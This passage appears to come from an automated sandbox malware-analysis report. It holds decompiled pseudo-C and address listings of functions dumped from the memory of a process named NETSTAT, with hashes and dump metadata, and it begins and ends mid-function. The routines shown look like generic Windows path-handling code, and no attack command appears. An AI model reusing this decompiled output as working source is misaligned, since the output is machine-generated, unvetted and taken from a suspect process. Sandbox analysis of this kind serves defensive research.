												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03424CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E033AD130(_t427, _t494, _t511);
				}
			}










































































                0x03425ba5
                0x03425baa
                0x03425baf
                0x03425bb4
                0x03425bb6
                0x03425bbc
                0x03425bbe
                0x03425bc4
                0x03425bcd
                0x03425bd3
                0x03425bd6
                0x03425bdc
                0x03425be0
                0x03425be3
                0x03425beb
                0x03425bf2
                0x03425bf8
                0x03425bfe
                0x03425c04
                0x03425c0e
                0x03425c18
                0x03425c1f
                0x03425c25
                0x03425c2a
                0x03425c2c
                0x03425c32
                0x03425c3a
                0x03425c3f
                0x03425c42
                0x03425c48
                0x03425c5b
                0x03425c5b
                0x03425c2c
                0x03425cb7
                0x03425cb9
                0x03425cbf
                0x03425cc2
                0x03425cca
                0x03425ccb
                0x03425ccb
                0x03425cd1
                0x03425cd7
                0x03425cda
                0x03425ce1
                0x03425ce4
                0x03425ce7
                0x03425ced
                0x03425cf3
                0x03425cf9
                0x03425cff
                0x03425d08
                0x03425d0a
                0x03425d0e
                0x03425d10
                0x00000000
                0x00000000
                0x03425d16
                0x03425d1a
                0x00000000
                0x00000000
                0x03425d20
                0x03425d22
                0x03425d25
                0x03425d2f
                0x03425d2f
                0x03425d33
                0x03425d3d
                0x03425d49
                0x03425d4b
                0x00000000
                0x00000000
                0x03425d5a
                0x03425d5d
                0x03425d60
                0x00000000
                0x00000000
                0x03425d66
                0x03425d69
                0x00000000
                0x00000000
                0x03425d6f
                0x03425d6f
                0x03425d73
                0x03425d79
                0x03425d7f
                0x03425d86
                0x03425d95
                0x03425d98
                0x03425dba
                0x03425dcb
                0x03425dce
                0x03425dd3
                0x03425dd6
                0x03425dd8
                0x03425de6
                0x03425dec
                0x03425dee
                0x03425df1
                0x03425df3
                0x0342635a
                0x0342635a
                0x00000000
                0x0342635a
                0x03425dfe
                0x03425e02
                0x03425e05
                0x03425e07
                0x03425e10
                0x03425e13
                0x03425e1b
                0x03425e1c
                0x03425e21
                0x03425e22
                0x03425e23
                0x03425e25
                0x03425e2a
                0x03425e2c
                0x03425e2e
                0x03425e36
                0x03425e39
                0x03425e42
                0x03425e47
                0x03425e4d
                0x03425e54
                0x03425e54
                0x03425e54
                0x03425e2e
                0x03425e5c
                0x03425e5f
                0x03425e62
                0x03425e64
                0x03425e6b
                0x03425e70
                0x03425e7a
                0x03425e7a
                0x03425e7a
                0x03425e6b
                0x03425e7e
                0x03425e7f
                0x03425e7f
                0x03425e81
                0x03425e87
                0x03425e8b
                0x03425e8c
                0x03425e8c
                0x03425e8c
                0x03425e9a
                0x03425e9c
                0x03425ea2
                0x03425ea6
                0x03425f50
                0x03425f50
                0x03425f57
                0x03425f66
                0x03425f66
                0x03425f66
                0x03425f68
                0x03425f6a
                0x034263d0
                0x00000000
                0x03425f70
                0x03425f70
                0x03425f91
                0x03425f9c
                0x03425f9e
                0x03425fa4
                0x03425fa6
                0x0342638c
                0x03426392
                0x034263a1
                0x034263a7
                0x034263af
                0x034263af
                0x034263bd
                0x034263d8
                0x00000000
                0x034263d8
                0x03425fac
                0x03425fb2
                0x03425fb4
                0x03425fbd
                0x03425fc6
                0x03425fce
                0x03425fd4
                0x03425fdc
                0x03425fec
                0x03425fed
                0x03425fee
                0x03425fef
                0x03425ff9
                0x03425ffa
                0x03425ffb
                0x03425ffc
                0x03426000
                0x03426004
                0x03426012
                0x03426012
                0x03426018
                0x03426019
                0x0342601a
                0x0342601b
                0x0342601c
                0x03426020
                0x03426059
                0x0342605c
                0x03426061
                0x03426061
                0x03426022
                0x03426022
                0x03426022
                0x03426025
                0x0342602a
                0x0342602b
                0x03426031
                0x03426037
                0x03426038
                0x0342603e
                0x03426048
                0x03426049
                0x0342604a
                0x0342604b
                0x0342604c
                0x0342604d
                0x03426053
                0x03426054
                0x03426054
                0x03426062
                0x03426065
                0x03426067
                0x0342606a
                0x03426070
                0x03426075
                0x03426076
                0x03426081
                0x03426087
                0x03426095
                0x03426099
                0x0342609e
                0x034260a4
                0x034260ae
                0x034260b0
                0x034260b3
                0x034260b6
                0x034260b8
                0x034260ba
                0x034260ba
                0x034260ba
                0x034260ba
                0x034260be
                0x034260c0
                0x034260c5
                0x034260c5
                0x034260c5
                0x034260c6
                0x034260cd
                0x03426114
                0x034260cf
                0x034260cf
                0x034260d4
                0x034260d5
                0x034260da
                0x034260db
                0x034260e1
                0x034260e2
                0x034260e8
                0x034260f8
                0x034260fd
                0x034260fe
                0x03426102
                0x03426104
                0x03426107
                0x03426109
                0x0342610b
                0x0342610b
                0x0342610b
                0x0342610b
                0x0342610f
                0x0342610f
                0x03426117
                0x0342611a
                0x0342611f
                0x03426125
                0x03426134
                0x03426139
                0x0342613f
                0x03426146
                0x03426148
                0x0342614b
                0x0342614d
                0x0342614f
                0x0342614f
                0x0342614f
                0x0342614f
                0x03426153
                0x03426159
                0x03426159
                0x0342615c
                0x03426163
                0x03426169
                0x0342616c
                0x03426172
                0x03426181
                0x03426186
                0x03426187
                0x0342618b
                0x03426191
                0x03426195
                0x034261a3
                0x034261bb
                0x034261c0
                0x034261c3
                0x034261cc
                0x034261d0
                0x034261dc
                0x034261de
                0x034261e1
                0x034261e4
                0x034261e6
                0x034261e8
                0x034261e8
                0x034261e8
                0x034261e8
                0x034261e6
                0x034261ec
                0x034261f3
                0x03426203
                0x03426209
                0x0342620a
                0x03426216
                0x0342621d
                0x03426227
                0x03426241
                0x03426246
                0x0342624c
                0x03426257
                0x03426259
                0x0342625c
                0x0342625e
                0x03426260
                0x03426260
                0x03426260
                0x03426260
                0x0342625e
                0x03426264
                0x03426267
                0x03426269
                0x03426315
                0x03426315
                0x0342631b
                0x0342631e
                0x03426324
                0x03426327
                0x0342632f
                0x03426330
                0x03426333
                0x0342633a
                0x0342633c
                0x03426335
                0x03426335
                0x03426335
                0x0342633f
                0x03426342
                0x0342634c
                0x03426352
                0x03426355
                0x03426355
                0x03426359
                0x00000000
                0x0342626f
                0x03426275
                0x03426275
                0x03426278
                0x0342627e
                0x0342627e
                0x03426281
                0x03426287
                0x0342628d
                0x03426298
                0x0342629c
                0x034262a2
                0x0342629e
                0x0342629e
                0x0342629e
                0x034262a7
                0x034262a7
                0x034262aa
                0x034262b0
                0x034262f0
                0x034262f0
                0x034262f2
                0x034262f8
                0x034262fd
                0x034262b2
                0x034262b2
                0x034262b2
                0x034262b5
                0x034262dd
                0x034262e2
                0x034262e5
                0x034262b7
                0x034262b8
                0x034262bb
                0x034262bd
                0x034262c0
                0x034262c4
                0x034262cd
                0x034262cd
                0x034262c0
                0x034262bb
                0x034262b5
                0x03426302
                0x03426303
                0x03426305
                0x03426305
                0x03426305
                0x0342630c
                0x0342630c
                0x00000000
                0x0342627e
                0x03426269
                0x03425eac
                0x03425ebb
                0x03425ebe
                0x03425ecb
                0x03425ecb
                0x03425ece
                0x03425ece
                0x03425ed4
                0x03425ed7
                0x03425ed9
                0x03425edb
                0x03425edb
                0x03425ee1
                0x03425ee1
                0x03425ee3
                0x03425f20
                0x03425f20
                0x03425ee5
                0x03425ee5
                0x03425ee5
                0x03425ee8
                0x03425f11
                0x03425f18
                0x03425eea
                0x03425eea
                0x03425eed
                0x03425ef2
                0x03425ef8
                0x03425efb
                0x03425f0a
                0x03425f0a
                0x03425eed
                0x03425ee8
                0x03425f22
                0x03425f28
                0x00000000
                0x00000000
                0x03425f30
                0x03425f31
                0x03425f37
                0x03425f3a
                0x03425f3d
                0x03425f44
                0x00000000
                0x00000000
                0x00000000
                0x03425f46
                0x03425f48
                0x03425f4d
                0x00000000
                0x03425f4d
                0x03425dda
                0x03425ddf
                0x00000000
                0x03425ddf
                0x03425dd8
                0x03425da7
                0x03425da9
                0x03425dac
                0x03425dae
                0x00000000
                0x03425db4
                0x03425db4
                0x00000000
                0x03425db4
                0x03425dae
                0x03425d88
                0x03425d8d
                0x03426363
                0x03426369
                0x0342636a
                0x03426370
                0x03426372
                0x0342637a
                0x0342637b
                0x0342637d
                0x00000000
                0x00000000
                0x0342637f
                0x03426385
                0x00000000
                0x03426385
                0x03425d38
                0x03425d3b
                0x00000000
                0x00000000
                0x00000000
                0x03425d3b
                0x03425d27
                0x03425d29
                0x00000000
                0x00000000
                0x00000000
                0x03426360
                0x00000000
                0x03426360
                0x03425c10
                0x03425c10
                0x034263da
                0x034263e5
                0x034263e5

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9343ab7c4f8e4948386855166b638714f6e09220bcdb07d5570868f2270ff559
                • Instruction ID: 026bdc5fff552ee47a5cce2282b105fae1c360b6029441b4bbfd19ed5ed3272e
                • Opcode Fuzzy Hash: 9343ab7c4f8e4948386855166b638714f6e09220bcdb07d5570868f2270ff559
                • Instruction Fuzzy Hash: F5423875900229CFDB24CF68C880BAAFBB1BF49304F5981EAD859EB342D7749985CF54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03374120 Relevance: .4, Instructions: 444COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 92%
                			E03374120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x344d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0338F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03376E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03374620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03376E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M033745F8))) {
												case 0:
													_v568 = 0x3331078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x33311c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03374620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0339F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0339F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E033552A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0336EB70(1, 0x34479a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0336AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E033995D0();
																			L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0339B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03393D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0339B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                0x03374128
                0x03374135
                0x0337413c
                0x03374141
                0x03374145
                0x03374147
                0x0337414e
                0x03374151
                0x03374159
                0x0337415c
                0x03374160
                0x03374164
                0x03374168
                0x0337416c
                0x0337417f
                0x03374181
                0x0337446a
                0x0337446a
                0x0337418c
                0x03374195
                0x03374199
                0x03374432
                0x03374439
                0x0337443d
                0x03374442
                0x03374447
                0x00000000
                0x0337419f
                0x033741a3
                0x033741b1
                0x033741b9
                0x033741bd
                0x033745db
                0x033745db
                0x00000000
                0x033741c3
                0x033741c3
                0x033741ce
                0x033741d4
                0x033be138
                0x033be13e
                0x033be169
                0x033be16d
                0x033be19e
                0x033be16f
                0x033be16f
                0x033be175
                0x033be179
                0x033be18f
                0x033be193
                0x00000000
                0x033be199
                0x00000000
                0x033be199
                0x033be193
                0x00000000
                0x00000000
                0x00000000
                0x033741da
                0x033741da
                0x033741df
                0x033741e4
                0x033741ec
                0x03374203
                0x03374207
                0x033be1fd
                0x03374222
                0x03374226
                0x033be1f3
                0x033be1f3
                0x0337422c
                0x0337422c
                0x03374233
                0x033be1ed
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x03374239
                0x03374239
                0x03374239
                0x03374239
                0x03374233
                0x03374226
                0x033741ee
                0x033741ee
                0x033741f4
                0x03374575
                0x033be1b1
                0x033be1b1
                0x00000000
                0x0337457b
                0x0337457b
                0x03374582
                0x033be1ab
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x03374588
                0x03374588
                0x0337458c
                0x033be1c4
                0x033be1c4
                0x00000000
                0x03374592
                0x03374592
                0x03374599
                0x033be1be
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0337459f
                0x0337459f
                0x033745a3
                0x033be1d7
                0x033be1e4
                0x00000000
                0x033745a9
                0x033745a9
                0x033745b0
                0x033be1d1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x033745b6
                0x033745b6
                0x033745b6
                0x00000000
                0x033745b6
                0x033745b0
                0x033745a3
                0x03374599
                0x0337458c
                0x03374582
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x033741f4
                0x0337423e
                0x03374241
                0x033745c0
                0x033745c4
                0x00000000
                0x033745ca
                0x033745ca
                0x00000000
                0x033be207
                0x033be20f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x033745d1
                0x00000000
                0x00000000
                0x033745ca
                0x00000000
                0x03374247
                0x03374247
                0x03374247
                0x03374249
                0x03374249
                0x03374249
                0x03374251
                0x03374251
                0x03374257
                0x0337425f
                0x0337426e
                0x03374270
                0x0337427a
                0x033be219
                0x033be219
                0x03374280
                0x03374282
                0x03374456
                0x033745ea
                0x00000000
                0x033745f0
                0x033be223
                0x00000000
                0x033be223
                0x0337445c
                0x0337445c
                0x00000000
                0x0337445c
                0x00000000
                0x03374288
                0x0337428c
                0x033be298
                0x03374292
                0x03374292
                0x0337429e
                0x033742a3
                0x033742a7
                0x033742ac
                0x033be22d
                0x033742b2
                0x033742b2
                0x033742b9
                0x033742bc
                0x033742c2
                0x033742ca
                0x033742cd
                0x033742cd
                0x033742d4
                0x0337433f
                0x0337433f
                0x033742d6
                0x033742d6
                0x033742d9
                0x033742dd
                0x033742eb
                0x033be23a
                0x033742f1
                0x03374305
                0x0337430d
                0x03374315
                0x03374318
                0x0337431f
                0x03374322
                0x0337432e
                0x0337433b
                0x0337433b
                0x00000000
                0x0337432e
                0x033742eb
                0x0337434c
                0x0337434e
                0x03374352
                0x03374359
                0x0337435e
                0x03374361
                0x0337436e
                0x0337438a
                0x0337438e
                0x03374396
                0x0337439e
                0x033743a1
                0x033743ad
                0x033743bb
                0x033743bb
                0x033743ad
                0x0337436e
                0x033743bf
                0x033743c5
                0x03374463
                0x03374463
                0x033743ce
                0x033743d5
                0x033743d9
                0x033743df
                0x03374475
                0x03374479
                0x03374491
                0x03374491
                0x03374479
                0x033743e5
                0x033743eb
                0x033743f4
                0x033743f6
                0x033743f9
                0x033743fc
                0x033743ff
                0x033744e8
                0x033744ed
                0x033744f3
                0x033be247
                0x00000000
                0x033744f9
                0x03374504
                0x03374508
                0x0337450f
                0x033be269
                0x00000000
                0x03374515
                0x03374519
                0x03374531
                0x03374534
                0x03374537
                0x0337453e
                0x03374541
                0x0337454a
                0x033be255
                0x033be255
                0x033be25b
                0x033be25e
                0x033be261
                0x033be261
                0x03374555
                0x03374559
                0x0337455d
                0x033be26d
                0x033be270
                0x033be274
                0x033be27a
                0x033be27d
                0x033be28e
                0x033be28e
                0x03374563
                0x03374563
                0x03374569
                0x03374569
                0x00000000
                0x0337455d
                0x0337450f
                0x00000000
                0x033744f3
                0x033743ff
                0x03374405
                0x03374405
                0x03374405
                0x033742ac
                0x0337428c
                0x03374282
                0x03374407
                0x0337440d
                0x033be2af
                0x033be2af
                0x03374413
                0x03374413
                0x00000000
                0x033741d4
                0x00000000
                0x033741c3
                0x033741bd
                0x03374415
                0x03374415
                0x03374416
                0x03374417
                0x03374429
                0x0337416e
                0x0337416e
                0x03374175
                0x03374498
                0x0337449f
                0x033be12d
                0x00000000
                0x033be133
                0x00000000
                0x033be133
                0x033744a5
                0x033744a5
                0x033744aa
                0x00000000
                0x033744bb
                0x033744ca
                0x033744d6
                0x033744d7
                0x033744d8
                0x033744e3
                0x033744e3
                0x033744aa
                0x0337417b
                0x0337417b
                0x0337417b
                0x00000000
                0x0337417b
                0x03374175
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3640270ba1c275abd33e38f211e73e398cee22d09e657ee789d304ad99035c93
                • Instruction ID: a05a6d8573fc16e305e19f55fc69a9184e4feb77abf82ed4dee8bb285d0e23d3
                • Opcode Fuzzy Hash: 3640270ba1c275abd33e38f211e73e398cee22d09e657ee789d304ad99035c93
                • Instruction Fuzzy Hash: 69F17C74A083118BC724DF1AC8C0A7AB7F5BF88754F19496EF586CB650E738E891CB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033820A0 Relevance: .4, Instructions: 420COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 92%
                			E033820A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
